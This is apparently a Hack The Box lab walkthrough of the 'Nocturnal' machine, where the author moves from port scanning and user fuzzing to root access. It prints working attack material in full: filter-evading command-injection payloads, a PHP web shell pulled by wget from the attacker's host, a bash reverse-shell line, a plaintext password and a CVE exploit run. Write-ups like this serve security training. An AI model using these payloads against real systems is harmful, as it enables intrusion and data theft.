Nocturnal is an easy-rated Linux machine on Hack The Box that serves as a great starting point for those looking to sharpen their basic Linux enumeration and exploitation skills. This box guides you through a series of straightforward steps involving information gathering, web enumeration, and privilege escalation, making it perfect for beginners or anyone looking to review essential penetration testing techniques.
We first begin with an Nmap scan of the target to get an idea of what all services it hosts.
Let’s first scan all the open ports and then scan for what services these ports are hosting using the service version detection and default scripts scan.
sudo nmap --min-rate 1000 10.10.11.64 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-12 22:14 IST
Nmap scan report for 10.10.11.64
Host is up (0.35s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sVC 10.10.11.64 -p 22,80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-12 22:18 IST
Nmap scan report for 10.10.11.64
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|\_ 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|\_http-title: Did not follow redirect to http://nocturnal.htb/
|\_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel
The scan shows that accessing port 80 via the IP address results in a redirection to http://nocturnal.htb. So, let us add the domain to our /etc/hosts file.
echo '10.10.11.64 nocturnal.htb' | sudo tee -a /etc/hosts
After adding the domain name to the /etc/hosts, we can type the IP address of the machine in the browser or type the domain address http://nocturnal.htb which leads us to the website hosted on our target.
Here, we see a link to register. On registering and logging in, we come across the dashboard which contains a file uploads field that takes PDF, XLSX, etc. files.
Just to check, we try uploading a random PDF file and it gets uploaded giving us a link to share our uploaded file.
On clicking the link, it leads us to the page: http://nocturnal.htb/view.php which accepts username and file parameters.
After some testing, we find that,
To get a logged in session with FFuF requests, we first need to get the PHPSESSID cookie using developer tools.
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u 'http://nocturnal.htb/view.php?username=FUZZ&file=.pdf' --cookie "PHPSESSID=nscfv0c..." -fs 2985
We obtain some other users through this command: admin, amanda, tobias.
When we visit the page of amanda, we find a privacy.odt file that contains a password.
Since, we have the password for amanda, we try logging in to her account and see an option to go to the Admin Panel.
The Admin Panel lets us view the content in the PHP files on the server and has an option to create a backup which even asks us for a password. Naturally, we take a look at the code in admin.php file where we might find an interesting way to exploit the backup process.
Just as we expected, at the bottom of the file, we find this code which reveals that the password field is vulnerable to command injection.
But wait, there’s a twist. The command injection would be stopped if detected by the cleanEntry function.
We intercept a backup creation request from BurpSuite and put the following acompilers value in the password field (We use tab instead of space and new line instead of semi-colon as CleanEntry filters them).
%0Abash%09-c%09"whoami"%0A%0A
Tip: If Burpsuite encodes every character and it does not work for you, you can always use: echo string | jq -sRr @uri
It works and returns www-data as the current user. We try a few things and finally make RCE (Remote Code Execution) work as follows:
<form method="GET">
<input type="text" name="cmd" />
<input type="button" action="submit">
</form>
<?php
system($\_GET['cmd']);
?>
python3 -m http.server
%0Abash%09-c%09"wget%09http://10.10.16.6:8000/shell.php"%0A
Finally, the shell gets downloaded and we go to http://nocturnal.htb/shell.php.
On this page, we execute the following command:
bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"
Start netcat to listen for reverse shell connection before executing the command. On our local machine terminal: nc -lvnp 4444
And Boom! We get the reverse shell.
Through the reverse shell, we go on to find the Sqlite database mentioned in the register.php file. The database is located at “/var/www/nocturnal_database/nocturnal_database.db”.
We can go through the database using:
sqlite3 /var/www/nocturnal\_database/nocturnal\_database.db
And view the users table using:
select * from users;
We put these hashes in https://crackstation.net to crack them. We obtain the password for tobias from there. This same password can be used to ssh into the target machine.
sshpass -p 'slowmotionapocalypse' ssh -o StrictHostKeyChecking=no [email protected]
We find the user flag in tobias’s home directory.
As user tobias, we perform basic reconnaissance and the netstat command reveals another service running at port 8080.
netstat -tulnp
So, we port forward it using ssh.
sshpass -p 'slowmotionapocalypse' ssh -o StrictHostKeyChecking=no -L 8081:localhost:8080 [email protected]
Once the ssh session starts, we can visit http://localhost:8081 on our browser. This shows a login page for ISPConfig. We can log in with username admin and password that was obtained for tobias earlier.
In the help tab, we find the version of ISPConfig running. Searching for common vulnerability and exploits for this version unveils CVE-2023–46818 which allows PHP code injection.
We can find exploits online such as this one. Through which we obtain the root flag. To use this exploit:
./exploit.sh http://127.0.0.1:8081 admin 'slowmotionapocalypse'
*Remember to chmod +x exploit.sh
This gives us the root shell on nocturnal and the root flag is obtained using:
cat /root/root.txt
This wraps up the Nocturnal Machine!